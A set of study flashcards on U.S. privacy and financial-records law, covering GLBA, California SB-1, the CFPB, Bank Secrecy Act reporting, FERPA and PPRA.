GLBA applies to “financial institutions,” which are defined broadly as any U.S. companies that are “significantly engaged” in financial activities. Financial institutions include entities such as banks, insurance providers, securities firms, payment settlement services, check-cashing services, credit counselors and mortgage lenders, among others.

336
Q

GLBA regulates financial institution management of

A

“nonpublic personal information,” defined as “personally identifiable financial information (i) provided by a consumer to a financial institution, (ii) resulting from a transaction or service performed for the consumer, or (iii) otherwise obtained by the financial institution.”

Excluded from the definition are publicly available information and any consumer list that is derived without using personally identifiable financial information

337
Q

Failure to comply with GLBA

A

Banking and related financial institutions that fail to comply with GLBA requirements can be subject to substantial penalties under the Financial Institution Reform, Recovery and Enforcement Act (FIRREA). FIRREA penalties range from up to $5,500 for violations of laws and regulations, to a maximum of $27,500 if violations are unsafe, unsound or reckless, to as much as $1.1 million for “knowing” violations.

338
Q

Consequences for failing to comply with the GLBA at the state level?

A

Institutions that fail to comply with GLBA requirements can be subject to substantial penalties under the Financial Institution Reform, Recovery and Enforcement Act (FIRREA). FIRREA penalties range from up to $5,500 for violations of laws and regulations, to a maximum of $27,500 if violations are unsafe, unsound or reckless, to as much as $1.1 million for “knowing” violations

339
Q

GLBA and preemption

A

Stricter state laws are not preempted under GLBA. The validity of stricter state laws, however, can be subject to challenge because there is limited preemption under FCRA, so courts would need to determine which federal financial privacy statute governs for a particular state law

340
Q

Is there a private right of action under the GLBA?

A

No. Although there is no private right of action under GLBA, failure to comply with certain notice requirements may be considered a deceptive trade practice by state and federal authorities. Some states also have private rights of action for this type of violation.

341
Q

Who does the GLBA privacy protections apply to?

A

GLBA’s privacy protections generally apply to “consumers,” or individuals who obtain financial products or services from a financial institution to be used primarily for personal, family or household purposes. Many of the act’s requirements relate to the subset of consumers who are also “customers”—consumers with whom the organization has an ongoing relationship. Financial services companies that do not have such “consumer customers” are not subject to some of GLBA’s requirements, such as those related to notice.

342
Q

Major components of the GLBA Privacy Rule provide that financial institutions must:

A
  1. Prepare and provide to customers clear and conspicuous notice of the financial institution’s information-sharing policies and practices. These notices must be provided when a customer relationship is established and annually thereafter.
  2. Clearly provide customers the right to opt out of having their nonpublic personal information shared with nonaffiliated third parties (subject to significant exceptions, including for joint marketing and processing of consumer transactions)
  3. Refrain from disclosing to any nonaffiliated third-party marketer, other than a consumer reporting agency, an account number or similar form of access code to a consumer’s credit card, deposit or transaction account
  4. Comply with regulatory standards established by certain government authorities to protect the security and confidentiality of customer records and information, and protect against security threats and unauthorized access to or certain uses of such records or information
343
Q

What must the GLBA privacy notice include?

A

The privacy notice itself must be a clear, conspicuous and accurate statement of the company’s privacy practices and must include the following:

  • What information the financial institution collects about its consumers and customers
  • With whom it shares the information
  • How it protects or safeguards the information
  • An explanation of how a consumer may opt out of having his or her information shared through a reasonable opt-out process
344
Q

Can financial institutions disclose consumer account numbers to nonaffiliated companies for purposes of telemarketing and direct mail marketing if the consumer has not opted out?

A

No. GLBA prohibits financial institutions from disclosing consumer account numbers to nonaffiliated companies for purposes of telemarketing and direct mail marketing (including through email), even if the consumer has not opted out of sharing the information for marketing purposes. Also, a financial institution must ensure that service providers will not use provided consumer data for anything other than the intended purpose

345
Q

In what situations does the consumer have no right to opt-out?

A
  • A financial institution shares information with outside companies that provide essential services like data processing or servicing accounts
  • The disclosure is legally required
  • A financial institution shares customer data with outside service providers that market the financial company’s products or services
346
Q

The GLBA Safeguards Rule

A

GLBA requires financial institutions to maintain security controls to protect the confidentiality and integrity of personal consumer information, including both electronic and paper records

347
Q

GLBA Safeguards Rule: Financial institution requirements

A

Develop and implement a comprehensive “information security program,” which is defined as a program that contains “administrative, technical and physical safeguards” to protect the security, confidentiality and integrity of customer information

348
Q

GLBA Safeguards Rule vs. GLBA Privacy Rule

A

Like the GLBA Privacy Rule, the Safeguards Rule distinguishes the concepts of security, confidentiality and integrity, but suggests that all three concepts are integral to a complete understanding of security

349
Q

GLBA Safeguards Rule: administrative security

A

includes program definition, management of workforce risks, employee training and vendor oversight

350
Q

GLBA Safeguards Rule: technical security

A

covers computer systems, networks and applications in addition to access controls and encryption

351
Q

GLBA Safeguards Rule: physical security

A

includes facilities, environmental safeguards, business continuity and disaster recovery

352
Q

Pursuant to the Safeguards Rule, the administrative, technical and physical safeguards to be implemented must be reasonably designed to:

A

(1) ensure the security and confidentiality of customer information,
(2) protect against any anticipated threats or hazards to the security or integrity of the information and
(3) protect against unauthorized access to or use of the information that could result in substantial harm or inconvenience to any customer

353
Q

The Safeguards Rule requires that certain basic elements be included in a security program. Each institution must:

A
  1. Designate an employee to coordinate the safeguards
  2. Identify and assess the risks to customer information in each relevant area of the company’s operation and evaluate the effectiveness of the current safeguards for controlling those risks
  3. Design and implement a safeguard program and regularly monitor and test it
  4. Select appropriate service providers and enter into agreements with them to implement safeguards
  5. Evaluate and adjust the program in light of relevant circumstances, including changes in business arrangements or operations, or the results of testing and monitoring of safeguards
354
Q

California SB-1

A
  • Aka California Financial Information Privacy Act, expands the financial privacy protections afforded under GLBA
  • SB-1 increases the disclosure requirements of financial institutions and grants consumers increased rights with regard to the sharing of information
355
Q

Non-compliance of California SB-1

A

Violation of SB-1 in cases of negligent noncompliance can be punished with statutory damages of $2,500 per consumer, up to a cap of $500,000 per occurrence. In cases of willful noncompliance, there is no $500,000 damage cap

356
Q

Does California SB-1 have opt-in or opt-out requirements?

A

It has both

357
Q

California SB-1: opt-in requirements

A

Written opt-in consent is required for a financial institution to share personal information with nonaffiliated third parties. Opt-in provisions must be presented on a form titled “Important Privacy Choices for Consumers” and be written in simple English

358
Q

California SB-1: opt-out requirements

A

SB-1 grants consumers the ability to opt out of information sharing between their financial institutions and affiliates not in the same line of business

359
Q

When does a financial institution not need consent under California SB-1?

A

A financial institution does not, however, need to obtain consumer consent in order to share nonmedical information with its wholly owned subsidiaries engaged in the same line of business—insurance, banking or securities—if they are regulated by the same functional regulator

360
Q

Why was the Dodd-Frank Wall Street Reform and Consumer Protection Act enacted?

A

In response to the financial crisis that became acute in 2008, Congress enacted the Dodd-Frank Wall Street Reform and Consumer Protection Act, which was signed into law in June 2010

361
Q

What did title X of the Dodd-Frank Wall Street Reform and Consumer Protection Act create?

A

Title X of the act created the CFPB as an independent bureau within the Federal Reserve

362
Q

The CFPB oversees the relationship between . . . .

A

The CFPB oversees the relationship between consumers and providers of financial products and services

363
Q

The CFPB has assumed rule-making authority for specific existing laws related to financial privacy and other consumer issues, such as . . .

A

FCRA, GLBA and Fair Debt Collection Practices Act

364
Q

CFPB and unfair and deceptive acts

A
  • The CFPB also can now bring enforcement actions for unfairness and deception
  • The CFPB has a new power to enforce against “abusive acts and practices”
365
Q

CFPB: abusive act or practice

A
  • Materially interferes with the ability of a consumer to understand a term or condition of a consumer financial product or service or
  • Takes unreasonable advantage of—
    (1) A lack of understanding on the part of the consumer of the material risks, costs, or conditions of the product or service;
    (2) The inability of the consumer to protect its interests in selecting or using a consumer financial product or service; or
    (3) The reasonable reliance by the consumer on a covered person to act in the interests of the consumer
366
Q

CFPB: penalties for violations

A

Civil penalties vary from $5,526 per day for federal consumer privacy law violations to $27,631 per day for reckless violations and $1,105,241 for knowing violations. Further, state attorneys general are also authorized to bring civil actions in enforcement of the law or regulations

367
Q

Where do AML laws stem from?

A

U.S. anti-money-laundering laws stem from the Bank Secrecy Act of 1970, which targeted organized crime groups and others who used large cash transactions. The laws became stricter as part of the USA PATRIOT Act of 2001, with its focus on antiterrorism efforts.

368
Q

What is the goal of AML laws?

A

The fundamental goal of anti-money-laundering laws is to “follow the money”

369
Q

The Bank Secrecy Act of 1970 (BSA)

A

Aka Currency and Foreign Transaction Reporting Act of 1970, authorizes the U.S. treasury secretary to issue regulations that impose extensive record-keeping and reporting requirements on financial institutions

370
Q

BSA: what records must financial institutions keep?

A

Specifically, financial institutions must keep records and file reports on certain financial transactions, including currency transactions in excess of $10,000, which may be relevant to criminal, tax or regulatory proceedings.

371
Q

Who is covered under the BSA?

A

The BSA applies to banks, securities brokers and dealers, money services businesses, telegraph companies, casinos, card clubs, and other entities subject to supervision by any state or federal bank supervisory authority. The scope of covered institutions has expanded over time to address the problem that criminals have an incentive to exploit whatever institutions are not already covered by the anti-money-laundering laws

372
Q

BSA and the IRS

A

The BSA generally requires currency transactions of $10,000 or more to be reported to the IRS per the regulations, using a Currency Transaction Report, Form 4789

373
Q

What is covered under the BSA?

A

The BSA regulations cover purchases of bank checks, drafts, cashier’s checks, money orders or traveler’s checks for $3,000 or more in currency

374
Q

What is NOT covered under the BSA?

A

Certain funds transfers are exempted from the regulation, however, including funds transfers governed by the Electronic Funds Transfer Act and those made through an automated clearinghouse, ATM or point-of-sale system

375
Q

BSA: record retention requirements - what must be kept and what can be disposed of?

A

Financial institutions are required to maintain records of all extensions of credit in excess of $10,000, but this does not include credit secured by real property. Not all records must be maintained—only those with a “high degree of usefulness”

Records that are maintained must include the borrower’s name and address, credit amount, purpose of credit and date of credit

376
Q

BSA: How long must records be kept?

A

Records must be maintained for 5 years

377
Q

BSA: record retention requirements - deposit account records

A

A financial institution must keep the depositor’s taxpayer identification number, signature cards, and checks exceeding $100 that are drawn or issued and payable by the bank

378
Q

BSA: record retention requirements - CDs

A

With regard to certificates of deposit, the financial institution must obtain the customer name and address, a description of the CD and the date of the transaction

379
Q

BSA: record retention requirements - wire transfers or direct deposits

A

For wire transfers or direct deposits, a financial institution must maintain all deposit slips or credit tickets for transactions exceeding $100

380
Q

Financial institutions must file a Suspicious Activity Report (SAR) in defined situations, what are they?

A

A SAR must be filed with the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) in the following circumstances:

(1) when a financial institution suspects that an insider is committing (or aiding the commission of) a crime, regardless of dollar amount;
(2) when the entity detects a possible crime involving $5,000 or more and has a substantial basis for identifying a suspect;
(3) when the entity detects a possible crime involving $25,000 or more (even if it has no substantial basis for identifying a suspect); and
(4) when the entity suspects currency transactions aggregating $5,000 or more that involve potential money laundering or a violation of the act.

381
Q

BSA: civil penalties

A

Civil penalties, including fines up to the greater of $25,000 or the amount of the transaction (up to a $100,000 maximum) as well as penalties for negligence ($500 per violation); additional penalties up to $5,000 per day for failure to comply with regulations; penalties of up to $25,000 per day for failure to comply with the information-sharing requirements of the USA PATRIOT Act; and penalties up to $1 million against financial institutions that fail to comply with due diligence requirements

382
Q

BSA: criminal penalties

A

Criminal penalties include up to a $100,000 fine and/or one-year imprisonment and up to a $10,000 fine and/or five-year imprisonment

383
Q

The BSA was expanded by . . .

A

As part of the USA PATRIOT Act, the International Money Laundering Abatement and Anti-Terrorist Financing Act of 2001 expanded the reach of the BSA and made other significant changes to U.S. anti-money-laundering laws

384
Q

International Money Laundering Abatement and Anti-Terrorist Financing Act

A

The act gave the U.S. treasury secretary the ability to promulgate broad rules to implement modified Know Your Customer requirements and to otherwise deter money laundering

385
Q

International Money Laundering Abatement and Anti-Terrorist Financing Act: What is required for covered entities?

A

For covered financial services companies, the major USA PATRIOT Act compliance issues can be grouped into the following categories:

(1) Information-sharing regulations and participation in the cooperative efforts to deter money laundering, as required by Section 314
(2) Know Your Customer rules, including the identification of beneficial owners of accounts—procedures required by Section 326
(3) Development and implementation of formal money-laundering programs as required by Section 352
(4) Bank Secrecy Act expansions, including new reporting and record-keeping requirements for different industries (such as broker-dealers) and currency transactions

386
Q

Foreign Account Tax Compliance Act of 2010 (FATCA)

A
  • Seeks to target non-compliance with U.S. tax laws for U.S. taxpayers with foreign accounts
  • To deter tax evasion and require greater withholding of income to these taxpayers, FATCA requires more detailed “know your customer” documentation for both domestic and foreign financial institutions
387
Q

Online banking: for consumers, privacy and security concerns can be addressed by measures including:

A
  • Letting customers know the type of authentication methods the financial institution has in place
  • Informing customers of the dangers of using public Wi-Fi connections
  • Empowering customers with information on mobile antivirus and malware detection software
  • Creating a mobile privacy policy and having it certified by a reputable third party
  • Fostering trust with customers by enabling them to decide which data to share and allowing them to opt out of mobile ad targeting
388
Q

Family Educational Rights and Privacy Act of 1974 (FERPA)

A
  • Aka Buckley Amendment
  • Provides students with control over disclosure and access to their education records

389
Q

FERPA: prevents schools from

A

The statute generally prevents schools from divulging education record information, such as grades and behavior, to parties other than the student, without that student’s consent

390
Q

FERPA: fair information principles

A

FERPA includes major aspects of Fair Information Practice Principles, including:

(1) notice,
(2) consent,
(3) access and correction,
(4) security
(5) accountability

391
Q

Who does FERPA apply to?

A

FERPA applies to all educational institutions that receive federal funding

Such funding exists for virtually all public and most private schools, especially at the postsecondary level

392
Q

What rights do students have under FERPA?

A
  • Control the disclosure of their education records to others
  • Review and seek amendment of their own education records
  • Receive annual notice of their rights under FERPA
  • File complaints with the U.S. Department of Education
393
Q

How does FERPA define an “education record”?

A
  • FERPA defines it to include all records that are directly related to the student and maintained by the school or by a party on behalf of the school. This extends beyond grades and other academic records to include financial aid records, disciplinary records and others related to the student
  • FERPA defines “record” as “any information recorded in any way, including, but not limited to, handwriting, print, computer media, video or audio tape, film, microfilm, and microfiche.” All electronic records and emails are covered by the term “computer media”
394
Q

What records are not considered an “education record” under FERPA?

A
  • Campus police records created and maintained by school campus police for law enforcement purposes
  • Employment records, when the employee is not a student at the university
  • Treatment records or health records, subject to several requirements
  • Applicant records of those who are not enrolled in the university
  • Alumni records created by a school after the individual is no longer a student
  • Grades on peer-graded papers, before they are collected and recorded by a faculty member or other university representative
395
Q

FERPA: Disclosure of education records is permitted only if one of the following conditions is met:

A
  • The information is not “personally identifiable”
  • The information is “directory information” whose release the student has not blocked
  • Consent has been provided by: (1) the parent, or (2) the student once the rights transfer to the student when he or she reaches the age of 18 or attends only a postsecondary institution
  • The disclosure is made to (1) the parent or (2) the student himself or herself once the rights transfer to the student when he or she reaches the age of 18 or attends only a postsecondary institution
  • A statutory exception applies, such as for health or safety purposes
396
Q

The Department of Education’s definition of “personally identifiable information” is similar to other statutory definitions. It includes, but is not limited to:

A
  • The student’s name
  • The name of the student’s parent or other family members
  • The student or student’s family’s address
  • Personal identifiers such as the Social Security number or student number
  • Other identifiers, such as date of birth
  • Other information that, alone or in combination, can be linked to a student and would allow the student to be identified with reasonable certainty
  • Information requested by a person whom the school reasonably believes knows the identity of the student to which the education record is linked
397
Q

FERPA: definition of “directory information”

A
  • “Directory information” is broadly defined by FERPA to include information that would not generally be considered an invasion of privacy or harmful if disclosed
  • FERPA does not designate specific information types as directory information for every educational institution but rather allows individual educational institutions to create their own definitions based on lists of examples provided in the statute and rules laid down by the Department of Education.
398
Q

FERPA: examples of “directory information”

A

name, date of birth, address, email address, telephone number, field of study, and honors received

399
Q

FERPA: Before an educational institution can declare information directory information and begin using it as such, the institution must provide students . . .

A

. . . students with an opportunity to opt out, or block the release of, their directory information. Students cannot use this opt-out to prevent the release of information that falls under a FERPA exception

400
Q

FERPA: what is specifically excluded as “directory information”?

A

The regulations promulgated under FERPA specifically exclude the use of Social Security numbers or student identification numbers as directory information. An educational institution, however, may use student identification numbers as directory information if that number cannot be used to access education records without another factor known only by the authorized user.

401
Q

FERPA: what is required for consent?

A

Valid student consent to disclosure must be signed (by hand or electronically), dated and written. It must also identify:

(1) The record(s) to be disclosed
(2) The purpose of disclosure
(3) To whom the disclosure is being made

402
Q

Exceptions to the FERPA consent requirements include the following:

A
  1. Disclosure to school officials who have determined a “legitimate educational interest” in the records
  2. Disclosure to educational institutions in which a student seeks or intends to enroll, or is currently enrolled, when the disclosure is for a purpose related to the student’s enrollment or transfer.
  3. Disclosure in connection with financial aid that the student has received or for which the student will apply, when the purpose of the disclosure is to determine the student’s eligibility for aid or conditions to or amount of financial aid.
  4. Disclosure to organizations doing research studies for, or on behalf of, educational institutions for the purpose of developing predictive tests, administering student aid programs or improving school instruction.
  5. Disclosure to accrediting organizations to fulfill accrediting duties.
  6. Disclosure to the alleged victim of a forcible or nonforcible sex offense.
  7. Disclosure of information related to sex offenders and others when the information is provided to the school under federal registration and disclosure requirements.
  8. Disclosure to a person or entity that is verified as the party that provided or created that record.
  9. Disclosure to law enforcement or otherwise to comply with a judicial order or subpoena.
  10. Disclosure to appropriate parties in connection with a “health or safety emergency,” if knowledge of this information is necessary to protect the health or safety of the student or others
403
Q

Exceptions to the FERPA consent requirements - Disclosure to school officials who have determined a “legitimate educational interest” in the records

A
  • A legitimate educational interest exists if the record is relevant and necessary to the school official’s responsibilities
  • This group includes school employees and board members as well as third-party vendors (1) to whom the school outsources duties and (2) who are under the direct control of the school regarding use and maintenance of the record.
  • These third parties are not permitted to disclose record information to any other party without consent, and cannot use the record for any purpose other than the one for which the disclosure was made
404
Q

Exceptions to the FERPA consent requirements - example of a Disclosure to a person or entity that is verified as the party that provided or created that record

A

if a student transfers high schools, the second school can disclose a student’s transcript to the original school to verify its authenticity

405
Q

Exceptions to the FERPA consent requirements - Disclosure to appropriate parties in connection with a “health or safety emergency,” if knowledge of this information is necessary to protect the health or safety of the student or others

A

The threat of harm must be “articulable and significant,” and the school can take the totality of the circumstances into account in making this determination. Information can be disclosed to any individual with the ability to assist in the situation—this includes parents, law enforcement, school officials, spouse or partner and other educational institutions, among others

406
Q

FERPA: A school is safe from federal scrutiny of its health and safety emergency determination as long as, based on the information available at the time, there is ________ for the determination

A

A school is safe from federal scrutiny of its health and safety emergency determination as long as, based on the information available at the time, there is a rational basis for the determination

407
Q

FERPA: Do students have a right to access their records?

A

FERPA provides students with the right to access and review their education records

408
Q

FERPA: how long does an institution have once a student has issued a request to access their records?

A
  • Once a student has issued a request, the educational institution must provide access to the records within 45 days of that request.
  • It also must respond to reasonable requests from students for explanations of the records
409
Q

FERPA: As with other disclosures to third parties, the educational institution must use _____ to verify the identity of the ______ making the record request

A

As with other disclosures to third parties, the educational institution must use reasonable measures to verify the identity of the student making the record request

410
Q

FERPA: can students amend their records?

A
  • Students can request corrections to their education records if they believe the records to be inaccurate, misleading or in violation of their privacy.
  • This access is intended to allow students to address incorrect records and is not for other purposes
  • If the request is granted, the records must be corrected within a reasonable time
411
Q

FERPA: if the student’s request to amend their record is denied . . .

A

The student has a right to request a hearing

412
Q

FERPA: hearing to amend records must meet:

A
  • The student must receive prior and reasonable notice of the time, place and date.
  • It must be held within a reasonable time after the request is made.
  • It must be conducted by a party without a direct interest in the outcome
  • The student must be afforded a “full and fair” opportunity to present his or her case, with or without assistance or representation.
  • The decision must be based on the evidence presented at the hearing, delivered, in writing, within a reasonable amount of time after the hearing, and must contain a summary and explanation for the decision
413
Q

How did the Protection of Pupil Rights Amendment (PPRA) originate?

A

Congress responded to concerns about the collection and disclosure of student information for commercial purposes by amending FERPA in 1978 with the Protection of Pupil Rights Amendment (PPRA)

414
Q

Protection of Pupil Rights Amendment (PPRA)

A

PPRA provides certain rights to parents of minors with regard to the collection of sensitive information from students through surveys.

415
Q

PPRA: what areas are covered?

A
  • Political affiliations
  • Mental and psychological problems potentially embarrassing to the student and his/her family
  • Sex behavior and attitudes
  • Illegal, antisocial, self-incriminating and demeaning behavior
  • Critical appraisals of other individuals with whom respondents have close family relationships
  • Legally recognized privileged or analogous relationships, such as those of lawyers, physicians and ministers
  • Religious practices, affiliations or beliefs of the student or student’s parent
  • Income (other than that required by law to determine eligibility for participation in a program or for receiving financial assistance under such program)
416
Q

The ____________ broadened the PPRA to limit the collection and disclosure of student survey information

A

The No Child Left Behind Act of 2001 broadened the PPRA to limit the collection and disclosure of student survey information

417
Q

The amended PPRA now requires schools to:

A
  • Enact policies regarding the collection, disclosure or use of personal information about students for commercial purposes
  • Allow parents to access and inspect surveys and other commercial instruments before they are administered to students
  • Provide advance notice to parents about the approximate date when these activities are scheduled
  • Provide parents the right to opt out of surveys or other sharing of student information for commercial purposes
418
Q

PPRA: who does it apply to?

A

PPRA requirements apply to all elementary and secondary schools that receive federal funding; the statute, however, does not apply to postsecondary schools

419
Q

Are health records subject to FERPA or HIPAA?

A
  • If the school receives federal funding, the health records are subject to FERPA—and not HIPAA—where a public elementary or secondary school provides a nurse for student health issues
  • By contrast, FERPA does not apply to private elementary or secondary schools that do not receive federal funding. Health records maintained by one of these private schools are thus subject to the HIPAA Privacy Rule if the school qualifies as a “covered entity” under the federal law
420
Q

Are health records in universities subject to FERPA or HIPAA?

A
  • A college or university with a healthcare clinic that treats only students is generally subject to the confidentiality requirements of FERPA relating to the student’s health-care records
  • Both FERPA and the HIPAA Privacy Rule typically apply to the college or university healthcare center that treats both students and nonstudents—such as faculty and staff
  • FERPA applies to the student health records, and the HIPAA Privacy Rule applies to the nonstudent health records
421
Q

Apps for Education case

A
  • In 2014, students in California who used Apps for Education sued Google, accusing the company of scanning millions of emails sent to and received by the students.
  • The Electronic Privacy Information Center, a nongovernmental organization focused on civil liberties and privacy, asserted that Google’s practice violated FERPA, and advocated for the Department of Education to investigate the company.
  • Soon after the lawsuit was filed, Google agreed to change its business practices to ensure that the information in the emails could not be used for commercial purposes
422
Q

K-12 School Service Provider Pledge to Safeguard Student Privacy includes . . .

A

includes a dozen specific provisions, including a prohibition on selling student personal information and a ban on using information collected in schools for behavioral targeting of advertisements to students

423
Q

Consequences of the K-12 School Service Provider Pledge to Safeguard Student Privacy

A

Violation of the pledge would make a company subject to enforcement as a deceptive trade practice under Section 5 of the Federal Trade Commission Act

424
Q

FERPA: what happens after the student turns 18?

A

At 18, the student is the person in control of rights connected to education records, including grades, rather than the parents. If a student has left high school and is attending only a postsecondary institution, the rights under FERPA are held by the student—regardless of the student’s age

425
Q

FERPA: is there an exception where a parent gets access to his child’s records after he turns 18?

A

Even after the rights under FERPA have transferred to the student, however, a school may disclose to the parents the educational records of the student, without the student’s consent, in the circumstance where the student is a dependent for tax purposes

426
Q

Is there a private right of action available in telemarketing?

A

The tort of “intrusion on seclusion” imposes liability on “one who intentionally intrudes, physically or otherwise, upon the solitude or seclusion of another or his private affairs or concerns”